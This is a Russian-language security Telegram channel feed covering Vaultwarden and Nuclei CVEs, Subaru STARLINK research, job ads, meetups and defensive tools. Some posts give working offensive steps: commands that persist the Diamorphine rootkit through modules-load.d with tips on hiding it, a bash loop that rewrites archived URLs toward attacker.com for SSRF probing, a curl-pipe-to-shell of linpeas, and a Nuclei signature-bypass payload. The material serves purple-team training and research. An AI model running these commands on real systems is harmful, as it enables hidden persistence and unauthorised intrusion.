PurpleBear

29 апреля 2025 12:08

Vaultwarden - Improper access control (CVE‑2025‑24364) и RCE (CVE‑2025‑24365)

Буквально вчера, крутой ресерчер Елизар Батин из BI.ZONE опубликовал технические детали 2-ух уязвимостей найденных в рамках исследования Vaultwarden. Это очень популярная реализация сервера Bitwarden с открытым исходным кодом, совместимая с официальными клиентами этого парольного менеджера, которая согласно статистики компании BI.ZONE используется в 10% всех компаний в нашей стране.

CVE‑2025‑24364 (оценка по CVSS=7.2)
Ролевая модель решения предусматривает доступ к секретам в рамках понятия Organization, т.е пользователи состоящие в определенной Организации имеют доступ только к соответствующим ей секретам. Суть уязвимости заключается в повышении привилегий пользователя до админа Организации с доступом ко всем секретам по причине некорректной логики функции Request Guard, используемой для проверки принадлежности конкретного пользователя к UUID конкретной Organization. Детали эксплуатации подробно описаны в блоге😎

CVE‑2025‑24365 (оценка по CVSS=8.1)
RCE на сервере Vaultwarden через доступ к веб-интерфейсу панели администратора. Эксплуатация заключается в возможности использовать команду для отправки SMTP-сообщений с помощью Sendmail, чтобы запустить пейлоад через bin/sh.
Дальше мне очень понравилось, сначала меняем путь до icon_cache_folder на подконтрольный атакующему сервер с пейлоадом в метаданных PNG. Vaultwarden сходит за новой иконкой и сохранит ее в /@icon/attacker-site.com.png
Далее подставляем абсолютный путь до нашего пейлоада в поле From Address и отправляем сообщение, которое выполнит нашу полезную нагрузку.

Таким образом, получается интересный вектор для Vaultwarden. Относительно рекомендаций, в первую очередь необходимо обновиться до версии 1.33.0 и далее отключить неиспользуемую функциональность приложения, как рекомендует автор уязвимостей.

PurpleBear

31 марта 2025 17:47

Всем привет!
Если этот пост опубликуется, значит канал разблокировали🎉

Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏

PurpleBear

03 марта 2025 15:02

The future of security testing: harness AI-Powered Extensibility in Burp

В прошлом месяце Portswigger анонсировали поддержку AI-powered расширений для Burp Suite. По капотом как и положено используется Montoya API, который выпустили в 2022 году на смену устаревшему Burp Extender API (2005 год).

Взаимодействие с AI моделью реализовано через этот интерфейс, что позволяет разработчикам сосредоточиться на функциональности расширений, а не думать как подружить свое решение с API провайдера LLM, но ограничивает в выборе конкретной модели и придется платить Portswigger чтобы покупать токены. По дефолту каждому пользователю Pro версии доступно 10,000 free AI credits. Ну и существуют некоторые опасения относительно конфиденциальности данных, которые отправляются модели, которые авторы попробовали развеять в этой статье.

На данный момент в BApp Store доступны всего несколько AI-powered расширений:
☑️ AI HTTP Analyzer (для Pro версии)
☑️ Hackvertor c AI функциональностью (для Community версии)

И есть еще Bounty Prompt, который позволяет подключить в качестве модели любую из поддерживаемых Groq Cloud с помощью универсального API.

Для того чтобы поиграться самостоятельно нужен релиз версии Early Adopter 2025.2, который можно переключить в Settings ➡️ Suite ➡️ Updates ➡️ Channel: Early Adopter, но уже в этом месяце поддержка AI-powered расширений появиться в версии Stable.

Как вы думаете, таким образом, скайнет💀 подбирается все ближе или такая автоматизация рутины освободит нам время для более творческих задач? Оставляйте свое мнение в комментариях🙏

PurpleBear

10 февраля 2025 08:28

Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin Panel

Пару недель назад легендарный исследователь Sam Curry опубликовал детали своего очередного ресерча, на этот раз под раздачу попали автомобили Subaru😎 Найденные баги позволяют открывать и заводить любой автомобиль удаленно, получать доступ к истории перемещений за последний год, получать доступ к личным данным (PII) владельцев и прочее.

Суть эксплуатации заключалась в реализации Account Takeover для служебного портала STARLINK, который является интерфейсом управления Subaru’s in-vehicle infotainment system, позволяющим сотрудникам компании удаленно управлять автомобилем (открывать/закрывать, включать/выключать зажигание)...через интернет🙈 С помощью перебора файлов в директории /assets/_js/ веб-сервера, был найден login.js, раскрывающий "особенности" функциональности сброса пароля, для которой достаточно отправить значение логина (email сотрудника) и новый пароль. Валидные почтовые аккаунты можно было энумерейтить через ручку /adminProfile/getSecurityQuestion.json?email=example@example.com которая возвращала секретные вопросы если аккаунт существует. Дальше был фееричный байпасс якобы 2FA, реализованного client-side через диалоговое окно HTMLDialogElement методом showModal()🤯
Таким образом можно было угнать/отслеживать любой автомобиль Subaru на территории США, Канады и Японии, уязвимости были устранены в течение 1 дня после репорта исследователя👍

По факту практически любой современный автомобиль представляет собой компьютер на колесах с кучей интеграций с различными сервисами производителя и если раньше для поиска критичных узявимостей был необходим физический доступ к самой машине, осциллограф, навыки автоэлектрики и механники, то сейчас вполне достаточно просто доступа к интернету, Burp'a и желания сделать свой автомобиль более безопасным🔥

PurpleBear

27 января 2025 10:13

Penetration Tester в Wildberries
ЗП: до 450 000 рублей net
Уровень: Senior
Формат: удаленка или гибрид

Мы в поиске новых тиммейтов в APT Wildbears💜

💫 Чем предстоит заниматься:
• Проведение проектов по анализу защищенности веб и мобильных приложений
• Проведение проектов по тестированию на проникновение (внешняя и внутренняя инфраструктура в т.ч СУБД, системы виртуализации и контейнеризации)
• Поиск и эксплуатация уязвимостей веб и мобильных приложений
• Поиск и эксплуатация уязвимостей и недостатков конфигурации ОС Linux а также специфичных для нее сервисов
• Поиск и эксплуатация уязвимостей OC Windows и недостатков конфигурации Active Directory
• Участие в проведение киберучений (Purple Teaming) в формате активного взаимодействия с подразделениями SOC (разработка и реализация сценариев и тест-кейсов киберучений)
• Оформление найденных уязвимостей для отчетов по итогам проектов

❤️ Что для этого нужно:
• Знание любого языка программирования на уровне достаточном для понимания/создания эксплойтов и автоматизации задач по поиску уязвимостей
• Опыт проведения проектов по анализу защищенности веб и мобильных приложений
• Опыт проведения проектов по тестированию на проникновение (внешняя и внутренняя инфраструктура)
• Опыт поиска и эксплуатации уязвимостей веб и мобильных приложений
• Опыт поиска и эксплуатации уязвимостей ОС Linux
• Опыт поиска и эксплуатации уязвимостей и недостатков конфигурации AD

🤪 Будет плюсом:
• Образование (бакалавр, магистр) в одном из технических вузов РФ (МИФИ, МГТУ им. Баумана, МГУ)
• Выступления на крупных конференциях и митапах, например PHDays, OffZone, Standoff и других
• Наличие профильных сертификатов (OSCP, OSWE, OSEP, CRTO)
• Участие в CTF и Bug Bounty

🔥 Что мы предлагаем
• Полная удаленка или свободное посещение офисов в Москве и Санкт-Петербурге
• Оформление в аккредитованную IT-компанию (с поддержкой условий IT-ипотеки)
• Бесплатное питание при работе из офиса
• Скидки у партнеров по обучению и внутренний корпоративный университет
• ДМС со стоматологией (после 3-х месяцев испытательного срока)
• Оплачиваемые Day Off
• Еженедельные развлекательные события - от бизнес-завтраков до просмотра фильмов на проекторе в офисах

Контакты: @virecruiter 👀 или можно ко мне в ЛС

PurpleBear

17 января 2025 08:00

Нужно ли классическое образование в ИБ?

Именно такой заголовок статьи натолкнул меня на филосовские мысли для этого пятничного поста🤓
Я часто слышу мнения относительно того, что академический поход имеет ряд серьезных недостатков, якобы в университетах учат только теории, многие технические гении современности вообще не имеют образования, а Диффи-Хеллман это просто какой-то мужик с двойной фамилией😂 и прочие агрументы.

Так нужно ли классическое образование в ИБ?
Краткий ответ: нет, но нужно гораздо большее

Абсолютно согласен с этим тезисом и поддерживаю мнение автора. Все знать невозможно по определению, но именно навыки полученные в ВУЗе позволяют быстро впитывать огромные объемы информации за короткие сроки, выделять самое главное и фильтровать воду. Этот скилл очень важен для пентестеров, так как в своей работе мы ежедневно имеем дело с огромным количеством различных технологий и необходимо в кратчайшие сроки разобраться в каждой из них и найти уязвимости и недостатки влияющие на безопасноть. Например, есть условный админ, который много лет работает с определенным ПО, который знает все тонкости и нюансы этой конкретной технологии, а против него пентестер, которому за короткий срок проекта надо найти баги и недостатки конфигурации, которые мог допустить этот админ😎

К тому же студенческое время это очень веселый период жизни, который через много лет можно будет вспоминать с теплотой и улыбкой. Университетские друзья это обычно друзья на всю жизнь, с которыми вместе преодолевали все трудности, радовались успехам и отмечая очередное окончания сессии после вечеринки могли проснуться на другом конце света, в тропиках...в пуховике😂 В прошлом году я начал немного преподавать в МИФИ и часто говорю студентам, что важно удерживать баланс между учебой и жизнью, не зацикливаться на чем то одном и получать удовольствие от всего что делаете😎 Поэтому не забывайте развлекаться и отдыхать в том числе!

А что вы думаете на эту тему? Предлагаю немного подискутировать в комментариях🙏

PurpleBear

31 декабря 2024 13:00

Поздравляю с наступающим Новым годом!🥳

Желаю, чтобы счастье и удача стали для Вас верными спутниками в Новом году!
Желаю крепкого здоровья Вам и вашим близким, пусть весь 2025 год сопровождают только радостные события, позитивные эмоции и успех во всех начинаниях!
Желаю прожить этот год, как хочется, радоваться жизни, ни о чем не сожалеть, не сомневаться и не терять уверенность в себе!
Желаю, чтобы под волшебный звон бокалов начался новый и интересный этап жизни!

С наступающим Новым годом!🎉🎉🎉 До встречи в 2025❤️

PurpleBear

23 декабря 2024 11:54

Давно у нас не было созвонов сообщества, все под конец года заняты... Огромное спасибо Вадиму за выделенное время 💜

Созвон сообщества в Zoom 26.12 в 19:00
Гость: Вадим Шелест (Wildberries) @purple_medved
Тема: Поговорим о наступательной кибербезопасноти, различных форматах тестирований на проникновение, затронем набирающую популярность тему APT Bugbounty. Обсудим концепцию создания внутреннего Red Team подразделения, ключевые различиях между внутренними и внешними командами, цели и задачи подразделения, состав, специализацию и навыки участников команды, методы и формат взаимодействия со смежными командами. Рассмотрим тенденции рынка, перспективы стартапов в отрасли наступательной кибербезопасноти и многое другое.

Приходите, будет интересно! максимальный репост поддерживается

Подключаться по ссылке
Событие добавлено в календарь мероприятий Ever Secure, добавляй к себе, что бы не пропустить 😉

📹EverSecure">YT | 📺RT | 📺ever_secure">VK | 💰Bty
👀@ever_secure

PurpleBear

16 декабря 2024 14:32

Я очень редко делаю репосты, но после доклада Паши на VK Security Confab были вопросы - как именно мы строили VM as Code😎 которые теперь можно задать автору напрямую в комментариях☝️
Как говорится ставьте лайк, подписывайтесь на канал и стройте свои IaC сканеры)

PurpleBear

16 декабря 2024 07:07

Этим летом на канале была заметка про PortSpoof - метод эффективного противодействия активной разведке и сканированию портов, который можно реализовать за 5 минут на iptables. Сегодня хочу познакомить вас с эволюцией этого метода, решением которое реализовано на Rust c использованием nftables и детально описанно в блоге Synacktiv.

Но для начала немного теории, nftables - это инструмент использующий netfilter, как основной компонет для взаимодействия с сетевым стеком ядра Linux, а именно возможностью управлять фильтрацией траффика и перенаправлением пакетов. Архитектурно это реализовано следующим образом, netfilter пропускает пакеты через цепочки (chains), которые являются упорядоченным списком правил (rules) для каждого семейства протоколов сгрупированного в виде таблиц (tables), а каждое правило может содержать критерии - определенное действие или переход. Когда пакет проходит через цепочку, netfilter по очереди проверяет, соответствует ли пакет всем критериям очередного правила, и если так, то выполняет действие (если критериев в правиле нет, то действие выполняется для всех пакетов, проходящих через правило).

Для реализации данного метода противодействия сканированию используются правила содержащие критерий Send a packet to userspace for further analysis, которое с помощью nfnetlink_queue позволяет отправить пакеты программе для автоматической блокировки IP-адреса источника, который стучится на закрытые порты нашего сервера более определенного количества раз.

Дочитав статью до конца вам станет понятно, что сам nftables умеет делать так самостоятельно, но лично мне как и автору понравилось небольшое погружение в Rust😎

Таким образом, предложенное решение отлично работает на практике и каждый день блокирует десятки адресов различных сканнеров моих внешних тачек.

PurpleBear

27 ноября 2024 12:03

Linux Persistence with LKM

Существуют десятки актуальных способов закрепления в Linux, а также инструментов автоматизации этой задачи, например один из последних - PANIX, это bash скрипт, который мы используем на киберучениях в рамках Purple Team.
Но в формате активного противодействия, редко есть возможности тащить на тачку разные скрипты, поэтому мы рассмотрим ручной способ на примере LKM (Loadable kernel module) руткита Diamorphine.

Diamorphine хорошо известный руткит с открытым исходным кодом, который активно используется злоумышленниками в дикой природе уже много лет, который можно загрузить различными способами. Наиболее распространенный - это просто положить в /etc/modules или использовать службу systemd-modules-load. Файлы конфигурации модулей systemd-modules-load ищет в следующих директориях: /etc/modules-load.d, /usr/lib/modules-load.d, /usr/local/lib/modules-load.d, /run/modules-load.d
🔴 Необходимо каким-то образом доставить Diamorphine или собрать из исходников на тачке, например в контейнере или еще как-нибудь, обычно зависит от уровня зрелости мониторинга и степени паранойи SOC на текущем проекте😁
🔴 Во время компиляции Diamorphine позволяет указать "magic string" - строку в начале наименования файла или директории, которую руткит автоматически скроет при загрузке, например apt1337
🔴 Копируем руткит и создаем список зависимостей modules.dep
cp diamorphine.ko /usr/lib/modules/$(uname -r)/kernel/drivers/block/apt1337-diamorphine.ko
depmod
🔴 Создаем файл конфигурации systemd-modules-load
echo apt1337-diamorphine >/usr/lib/modules-load.d/apt1337-not_evil.conf
🔴 Загружаем модуль вручную
modprobe apt1337-diamorphine

Таким образом, при каждой перезагрузке системы руткит в качестве модуля LKM будет загружаться автоматически😎 Безусловно техника базовая и довольно распространенная, поэтому нуждается в доработке относительно сокрытия. Как минимум рекомендую использовать Timestomping для файлов в /usr/lib/modules/* и использовать менее очевидный нейминг.
Но все равно это будет светиться в /proc/sys/kernel/tainted так как загруженный модуль не подписан, но это уже тема другой заметки😁

PurpleBear

26 ноября 2024 10:00

🎉 Результаты розыгрыша:

Победители:
1. Vsevolod (@B0D0B0P0T)
2. fiodrych (@fiodrych)
3. Andy (@fr35b1)
4. Depost (@GorgonzolaCTF)
5. Cyber (@cyberopus)

Проверить результаты

PurpleBear

18 ноября 2024 09:30

У моих хороших друзей из Deteact есть вакансия:

Penetration Tester, ООО «Непрерывные технологии» https://deteact.ru/

ЗП: 150-300т.р. (есть ежеквартальные премии в среднем 25% от зп)
Формат: удаленка
Чем предстоит заниматься:
•Участие в проектах по тестированию на проникновение, red-team.
•Разработка/адаптация специализированных инструментов, автоматизация процессов.
•Исследование современных средств и систем обеспечения ИБ, написание эксплойтов.
Чем НЕ предстоит заниматься:
•Участие в пресейловых встречах.
•Разработка отчетов.

Что необходимо для успешного выполнения задач:
•Понимание red-team killchain.
•Уверенное владение всем необходимым инструментарием, опыт его доработки, автоматизации задач.
•Понимание принципов работы основных СЗИ (WAF, IPS, IDS, EDR, NAC), способов их обхода.
•Опыт проведения фишинговых атак.
Будет преимуществом:
•Опыт участия во всех стадиях red-team активностей.
•Опыт в тестировании на территории заказчика (СКУД, BadUSB/ETH, WiFi, etc).
•Опыт публичных выступлений, написания статей.
•Наличие профессиональной сертификации (OSEP, OSCE, OSWE, etc).

Мы можем предложить:
•Работа удалённо, с гибким началом рабочего дня.
•Молодой и позитивный коллектив, быстрорастущая компания.
•Интересные и разноплановые задачи, способствующие профессиональному развитию.
•Время на исследования и публикации.
•Участие в конференциях и обучение.
•Отсутствие бюрократии, дресс-кода, дружную атмосферу.
•Компания аккредитована в Минцифры, поэтому доступны соответствующие плюшки.

Контакты для отправки резюме: @Varvara_hrbp

PurpleBear

29 октября 2024 08:12

Red Teaming: In-house vs Outsource

Небольшой философский пост для утра вторника😁Что же эффективнее, собственная внутренняя команда или внешний консалтинг?

Для себя сформулировал несколько ключевых отличий:
🔴 Outsource
🎯 Цель: Заработать денег💰
✅ Готовая команда универсальных квалифицированных исполнителей;
✅ Ротация участников команды;
✅ Универсальная методология проведения работ;
✅ Ограничение времени проекта в соответствии с условиями договора.

🔴 In-house
🎯 Цель: Сделать компанию более защищенной😎
✅ Специализация каждого участника команды;
✅ Постоянный состав команды;
✅ Адаптированная методология проведения работ с учетом индивидуальных особенностей инфраструктуры и СЗИ;
✅ Более глубокое понимание используемых технологий и выстроенных процессов;
✅ Отсутствие ограничений по времени;
✅ Налаженный процесс взаимодействия с ключевыми заказчиками.

Крупные компании во всем мире используют комбинированный подход, создают внутренние подразделения и привлекают внешние команды для проведения тестирований в формате Red Teaming. А что вы думаете по этому поводу? Оставляйте свое мнение в комментариях🙏

PurpleBear

22 октября 2024 10:07

Stixview

Сегодняшняя короткая заметка посвящена инструменту для визуализации CTI отчетов в STIX2. Мне очень нравится визуальное представление любой аналитки, так как во-первых контекст позволяет увидеть более полную картину, во-вторых это просто красиво😁

Stixview представляет собой библиотеку на JS, которая принимает данные в формате STIX2 (Structured Threat Information Expression), по сути это просто JSON и строит граф взаимосвязей между объектами. Демо инструмента доступно по ссылке

Таким образом, можно автоматически разнообразить скучную аналитику и добавить интерактивное повествование в CTI отчет😎

PurpleBear

02 апреля 2025 11:09

Недавно мне попался интересный проект AttackRuleMap, который представляет собой маппинг тест-кейсов инструмента Atomic Red Team и соответствующих правил обнаружения в формате Sigma. Данный ресурс может быть очень полезен, чтобы обеспечить покрытие алертами большей части техник MITRE, особенно на ранних этапах уровня зрелости команды Detection Engineering.

Но далеко не все SIEM из коробки поддерживают этот универсальный формат для пра­вил обнаружения, поэтому если у вас в компании изпользуется, например Elastic SIEM, то потребуется конвертировать правила в KQL (Kibana Query Language) и EQL (Event Query Language).

Реализовать данную задачу можно с помощью pySigma и Sigma CLI, которые пришли на смену Sigmac. Раньше был еще онлайн-конвертер uncoder.io (на данный момент ресурс по какой-то причине лежит🤷‍♂️), который позволял просто в веб-интерфейсе конвертировать Sigma правила для выбранного SIEM (включая Elastic KQL, Elastic EQL).
При этом существуют некоторые недостатки связанные с конвертацией правил, которые описаны в этой статье.

Но тем не менее, мне кажется, это хорошая отправная точка для старта, когда в первую очередь необходимо обеспечить максимально возможное покрытие стандартных техник и процедур злоумышленников в короткие сроки😎

PurpleBear

20 марта 2025 10:43

Всем привет!
Небольшая заметка про поиск SSRF и Open Redirect😁 в составе пайплайнов автоматизации

waybackurls target.com | grep -E "/https?://|=https?://|=/.*" | while read url; do random=(opensslrand−base646∣tr−d ′ /+ ′ );murl=(echo $url | sed -E "s/(/|=)(https?://[^/&?]+)/\1http://attacker.com/$random/g;s/=/[^&]+/=http://attacker.com/$random/g") && echo "Requesting: $murl" && curl -so /dev/null --connect-timeout 5 "$murl"; done

🔴Этот bash скрипт использует утилиту waybackurls, чтобы получить список всех известных url для заданного домена target.com из архива Wayback Machine.
🔴 Фильтрует полученные url c помощью регулярки, оставляя только потенциально уязвимые, которые содержат:
/https://example.com, ?url=http://example.com и ?url=/example
🔴 Для каждого url из списка генерирует случайную строку длиной 6 символов с помощью openssl rand, заворачивает в base64 и удаляет символы / и + на выходе получается что-то такое -a1b2c3
🔴 Модифицирует каждый url, заменяя:
http://example.com на /http://attacker.com/random.
http://example.com на =http://attacker.com/random.
/example на =http://attacker.com/random
🔴 Выводит в консоль модифицированный url перед отправкой запроса либо сохраняет в файл echo "$(date '+%Y-%m-%d %H:%M:%S') Requesting: $murl" | tee -a log.txt
🔴 Отправляет запросы с помощью curl c ограничением время ответа 5 сек, чтобы логировать статус коды ответов можно добавить:
http_code=$(curl -so /dev/null --connect-timeout 5 -w "%{http_code}" "$murl")
echo "$(date '+%Y-%m-%d %H:%M:%S') Response [$http_code] from: $murl" >> responses.txt

В качестве сервера атакующего, чтобы ловить отстуки можно использовать что угодно, начиная от Burp Collaborator до interactsh на своем домене.

PurpleBear

19 февраля 2025 08:46

One LLM chat to rule them all

Использование больших языковых моделей в наши дни уже стало привычной рутиной для большинства людей во многих областях деятельности. Регулярно появляются новые модели с новой функциональностью, на примере с DeepSeek R1 спровоцировавшей панику на фондовом рынке в конце января. Мне как и думаю большинству из вас тогда сразу же захотелось ее потестировать, чтобы заставить бездушную машину поразмышлять о смысле жизни, будущем атакующей кибербезопасности и о том как Алексей Лукацкий может писать столько постов в своем канале🤠 а также других риторических вопросах.

Представляю вашему вниманию небольшой обзор двух достойных приложений с LLM чатами в веб-интерфейсе с открытым исходным, которые можно развернуть самостоятельно и значительно увеличить потенциал использования больших языковых моделей. А дочитав до конца вы узнаете, как получить в свое распоряжение API для более 100 различных моделей абсолютно бесплатно😎

PurpleBear

04 февраля 2025 09:27

Living Off The Tunnels

В полку Living Off The Land очередное пополнение - LOTTunnels, консолидированный список различных инструментов для туннелирования трафика, которые используются злоумышленниками для обеспечения доступа и извлечения информации во время кибератак.

На данный момент список включает всего 22 инструмента, но есть некоторые ранее незнакомые🙈
Ну и как community driven проект LOTTunnels будет дальше развиваться с помощью контрибьюторов. В описании утилит есть читшит, референсы и начальные методы обнаружения, лично мне не хватает только прайса и условий использования.

В любом случае это хорошая возможность включить новые инструменты в качестве тест-кейсов в сценарии киберучений в формате Purple Teaming😎

PurpleBear

24 января 2025 10:49

Backdooring Your Backdoors - Another $20 Domain, More Governments

Интересный ресерч от watchTowr из серии "hackers hacking hackers". В ходе исследования были проанализированы исходники различных веб-шеллов с открытым исходным кодом и обнаружены некоторые закладки недокументированные особенности😎 Например, некоторые возможно вспомнят историю с бэкдором в веб-шелле c99shcook, который сливал логопасы разработчику. Исследователи пошли дальше и зарегали на себя просроченные домены (40+), на которые отстукивались различные веб-шеллы и начали анализировать полученные доступы данные телеметрии😎

Результаты анализа включают около 4000 взломанных веб-серверов, в том числе несколько ресурсов в доменной зоне .gov, на которые заливались различные веб-шеллы🙈

В целом ничего нового и так было всегда, но заставляет задуматься о вечном том, что мы как security профессионалы по умолчанию обязаны читать исходники любых opensource инструментов, которые используем в инфраструктуре заказчиков. Но ведь иногда бывают ситуации, когда проверенного инструмента просто нет под рукой и необходимо принести его с гитхаба из репозитория уважаемого автора offensive утилит.

Например, поставьте лайк👍 если когда-нибудь делали так:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Автор linpeas в прошлом году проводил эксперимент и просто по фану в рамках повышения осведомленности временно добавил в свой скрипт сбор телеметрии, где именно используется его инструмент, подробности и скриншоты будут в комментариях.

PS: Желаю всем удачного завершения рабочей недели и хороших выходных!

PurpleBear

09 января 2025 08:10

CVE-2024-43405 - Nuclei's template signature verification bypass

Начнем первый рабочий день с обзора уязвимости CVE-2024-43405 (оценка по CVSS=7.8) в Nuclei, которая может привести к RCE на сервере сканера. С версии Nuclei 3.0 появилась возможность выполнения кода на хостовой ОС с помощью code protocol, что позволяет создавать шаблоны с более сложной логикой и существенно расширяет возможности сканера. В этом же релизе была анонсирована возможность подписывать и проверять темплейты. Суть данной уязвимости в возможности обхода этого механизма для добавления вредоносного кода и его выполнении из подписанного шаблона.

Относительно технических деталей, опубликованных в блоге исследователей из Wiz, уязвимость возникает из-за неправильной интерпретации управляющих символов \r\n используемыми парсерами. Для парсинга YAML содержимого темплейта используется библиотека gopkg.in/yaml.v2, которая интерпретирует x0A (\n), x0D (\r) или комбинацию (\r\n) как конец строки. А механизм проверки подписи использует regex (?m)^#\\sdigest:\s.+$ для проверки подписи после # digest:

А так как логика для проверки подписи предполагает, что проверяется только первое вхождение и символы \\r будут интерпретироваться regex парсером как часть строки, а YAML парсер будет считать их указанием на перенос строки🙈 а механизм проверки перед подсчетом хеша удаляет все строки с # digest: поэтому можно вставить вредоносный код во второе вхождение и он успешно пройдет проверку и будет выполнен:

# digest: <valid-signature>
# digest: <injected-signature>\rcode:\r\r engine:\r - sh\r source: |\r echo "This is injected and executed!" > /tmp/payload.txt

Таким образом, обновляемся до версии Nuclei 3.3.2 и выше, а лучше вообще никогда не используем чужие темплейты без дополнительной верификации содержимого, особенно если это всякие агрегаторы сommunity темплейтов😁

PurpleBear

28 декабря 2024 18:02

PurpleBear 2024 ➡️ PurpleBear 2025

Итоги уходящего года хочу традиционно начать со слов благодарности всем читателям❤️

От души благодарю каждого из Вас, особенно большое спасибо всем кто лайкал, делился и комментировал, именно благодаря вашей поддержке канал развивается, нас уже более 3500 человек🎉

В 2025 году готовим для Вас кое-что интересное...

Желаю всем хорошего окончания года и веселой предпраздничной суеты🎄

PurpleBear

23 декабря 2024 08:25

Всем привет!
Летом у нас была подборка по self-hosted лабораторным окружениям, сегодня предлагаю вашему вниманию список различных ресурсов позволяющих совершенствовать навыки по различным доменам знаний атакующих и защитников в онлайн формате:

☑️ HackTheBox - https://www.hackthebox.com
☑️ Standoff365 - https://range.standoff365.com/
☑️ Try Hack Me - https://tryhackme.com
☑️ Defbox - https://defbox.io/
☑️ Attack-Defense - https://attackdefense.com
☑️ Alert to win - https://alf.nu/alert1
☑️ CryptoHack - https://cryptohack.org/
☑️ CMD Challenge - https://cmdchallenge.com
☑️ Cyberdefenders - https://cyberdefenders.org/blueteam-ctf-challenges/
☑️ Defend The Web - https://defendtheweb.net/
☑️ Exploitation Education - https://exploit.education
☑️ Google CTF - https://capturetheflag.withgoogle.com/
☑️ Hacker101 - https://ctf.hacker101.com
☑️ Hacking-Lab - https://hacking-lab.com/
☑️ ImmersiveLabs - https://immersivelabs.com
☑️ Infinity Learning CWL - https://cyberwarfare.live/infinity-learning/
☑️ LetsDefend- https://letsdefend.io/
☑️ NewbieContest - https://www.newbiecontest.org/
☑️ OverTheWire - http://overthewire.org
☑️ Pentesterlab - https://pentesterlab.com
☑️ PentestIT LAB - https://lab.pentestit.ru
☑️ PicoCTF - https://picoctf.com
☑️ PWNABLE - https://pwnable.kr/play.php
☑️ Root-Me - https://www.root-me.org
☑️ SANS Holiday hack - https://www.sans.org/mlp/holiday-hack-challenge-2024
☑️ SmashTheStack - https://www.smashthestack.org/main.html
☑️ The Cryptopals Crypto Challenges - https://cryptopals.com
☑️ Vulnhub - https://www.vulnhub.com
☑️ Vulnmachine - https://www.vulnmachines.com/
☑️ W3Challs - https://w3challs.com
☑️ Websploit - https://websploit.org/
☑️ Zenk-Security - https://www.zenk-security.com/

PurpleBear

16 декабря 2024 14:32

Теперь немного про суть доклада.

- запись
- презентация
- описание

В безопасности мы часто сталкиваемся с задачами, которые на первый взгляд кажутся сложными. Но многие из них можно решить просто (относительно), если подойти к ним с правильной стороны. Возможно, тут дело в том, что мы, как инженеры, часто уходим в оверинжиниринг, кто знает…

Я неоднократно сталкивался с проектами, которые приходилось переосмысливать и перезапускать по несколько раз. Почему так происходит?
Дело в том, что невозможно предвидеть все проблемы на старте:
• технические ограничения могут проявиться только в процессе реализации
• бизнес-модель может измениться
• (что-угодно, вставь свое)

Если у вас всегда получается сделать все с первого раза - научите :))

Но важно не переступить грань и не перейти в фазу постоянно перезапускающихся проектов, все-таки мы тут, чтобы делать дела.

По итогам доклада хочется выделить две мысли.

Гибкость мышления. В условиях переменчивого мира и ограниченных ресурсов нам критически важно сохранять открытость ума. Нельзя зацикливаться на одном решении, подходе, практиках. Очень важно:
1. уметь проводить аналогии между проблемами ИБ и общими задачами IT + это поможет увидеть, как можно адаптировать решения IT под решение задач ИБ
2. иметь широкий взгляд на вещи, позволяющий увидеть нестандартные решения

Парадокс простоты. Интересно, что первое «простое», как нам кажется, решение обычно оказывается совсем не простым. А найти простое решение сложной проблемы зачастую бывает очень даже непросто. Это требует:
• глубокого понимания сути проблемы
• креативного подхода к поиску решений
• готовности отбросить привычные шаблоны мышления
• высокого уровня общей эрудиции

Нам надо стремиться к простоте. Постепенно совершенствуя наши процессы и подходы, мы можем находить эти упрощения. Простота позволит нам эффективнее решать наши задачи, концентрируя усилия на новых вызовах.

Илон Макс делился примером эволюции двигателя Raptor. Лучше один раз увидеть, чем 10 раз читать.

PurpleBear

09 декабря 2024 16:02

VK Security Confab Max

11 декабря компания VK приглашает профессионалов в области информационной безопасности на конференцию VK Security Confab Max. Мероприятие объединит ведущих экспертов VK и крупнейших BigTech-компаний, чтобы поделиться практическими кейсами, внутренними разработками и лучшими практиками в сфере практической информационной безопасности.

Конференция разделена на два трека, чтобы каждый участник мог найти что-то интересное для себя: от защиты облачных технологий до обнаружения сложных уязвимостей. На повестке дня – актуальные вызовы, с которыми сталкиваются специалисты по информационной безопасности и проверенные решения, которые помогают их преодолеть.
Программа обоих треков уже опубликована на сайте.

На конференции выступит мой хороший друг и коллега Павел Пархомец @ciso_space с докладом "Через тернии к IaC: наша эволюция сканирования распределенной инфраструктуры", в котором расскажет об опыте создания оркестратора для сканеров уязвимостей в огромной инфраструктуре WB, какой путь мы прошли, с какими трудностями столкнулись и размышления о том, как мы учились на своих ошибках в процессе создания подобного решения.

Приходите, будет интересно! У кого не получится присутствовать лично, ссылка на онлайн трансляцию будет в @vk_security

🕓 Дата: 11 декабря 2024 г.
📍 Локация: Москва, офис VK, БЦ SkyLight, Ленинградский проспект, 39, стр. 79

PurpleBear

26 ноября 2024 10:16

Поздравляю счастливых обладателей проходок!🎉🎉🎉
В течение дня свяжусь со всеми победителями в ЛС.

PS: Всем хорошего вторника и удачной недели!

PurpleBear

23 ноября 2024 08:28

Мои друзья из Лаборатории Касперского проводят Offensive Meetup #3

На нем мы расскажем про создание APT Wildbears😎 А именно как медведи охотятся за дикими ягодами, как заставить SOC нервничать при упоминании киберучений и почему Red Team становится Enabling Team для различных подразделений компании.

Мероприятие приватное, записей не будет, вход только по персональным приглашениям.
Но у меня есть 5 проходок, которые мы разыграем. Условия простые, необходимо быть подписанным на канал и нажать кнопку Участвовать, а счастливых обладателей определит рандом 26.11 в 12:00

Митап пройдет 05.12 в 18:30
в одном из баров Москвы, точная локация будет указана в персональном приглашении.

Какие еще будут доклады? https://telegra.ph/Offensive-Meetup-11-21

Желаю всем хороших выходных!

PurpleBear

11 ноября 2024 11:11

Securing SSH with FIDO2

Небольшая заметка про прикладную задачу обеспечения дополнительного уровня контроля для доступа по SSH.

Существует различные способы реализации 2FA для доступа на сервер по SSH с помощью YubiKey:
✅ PIV (Personal Identity Verification) модуль
Суть заключается в том, что публичный и приватный ключ RSA/ ECC создается прямо на YubiKey, им подписывается сертификат для взаимодействия с SSH сервером через интерфейс PKCS #11 https://github.com/Yubico/yubico-piv-tool
ssh -o "PKCS11Provider /usr/local/lib/libykcs11.dylib" user@remote
Проверенный способ, который часто используется в компаниях, к недостаткам которого можно отнести необходимость использования дополнительного софта и ограничение на кол-во слотов на самом девайсе.

✅ OpenPGP
Тут я даже не буду пытаться объяснить как работает GnuPG, а просто передам привет моему преподавателю криптографии😂 В двух словах, это самый хардкорный способ с точки зрения реализации, к преимуществам которого можно отнести возможность импорта существующих ключей и возможность распечатать бэкап на бумаге😎 https://gist.github.com/artizirk/d09ce3570021b0f65469cb450bee5e29

